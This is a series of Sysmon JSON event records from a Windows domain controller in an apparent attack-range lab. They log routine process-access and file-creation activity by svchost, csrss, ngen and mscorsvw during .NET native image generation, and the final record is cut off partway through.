{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7530,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:40.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CC-5F25-0000-00108CA91000}\r\nTargetProcessId: 600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:40.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CC-5F25-0000-00108CA91000}","TargetProcessId":"600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7531,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:40.371\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0498-5F25-0000-00102B5B0F00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:40.371","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0498-5F25-0000-00102B5B0F00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7532,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:40.371\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0498-5F25-0000-00102B5B0F00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:40.371","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0498-5F25-0000-00102B5B0F00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7533,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:40.371\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0498-5F25-0000-00102B5B0F00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:40.371","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0498-5F25-0000-00102B5B0F00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7534,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:40.887\r\nProcessGuid: {A837DB8D-04CC-5F25-0000-0010CAAD1000}\r\nProcessId: 4996\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1384-0\\System.IdentityModel.Services.dll\r\nCreationUtcTime: 2020-08-01 05:59:40.887","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:40.887","ProcessGuid":"{A837DB8D-04CC-5F25-0000-0010CAAD1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1384-0\\System.IdentityModel.Services.dll","CreationUtcTime":"2020-08-01 05:59:40.887","EventReceivedTime":"2020-08-01 05:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7535,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:40.934\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CC-5F25-0000-0010F5B41000}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:40.934","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CC-5F25-0000-0010F5B41000}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7536,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:40.934\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CC-5F25-0000-0010F5B41000}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:40.934","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CC-5F25-0000-0010F5B41000}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7537,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:40.934\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CC-5F25-0000-0010F5B41000}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:40.934","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CC-5F25-0000-0010F5B41000}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7538,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:40.981\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CC-5F25-0000-00101DB81000}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 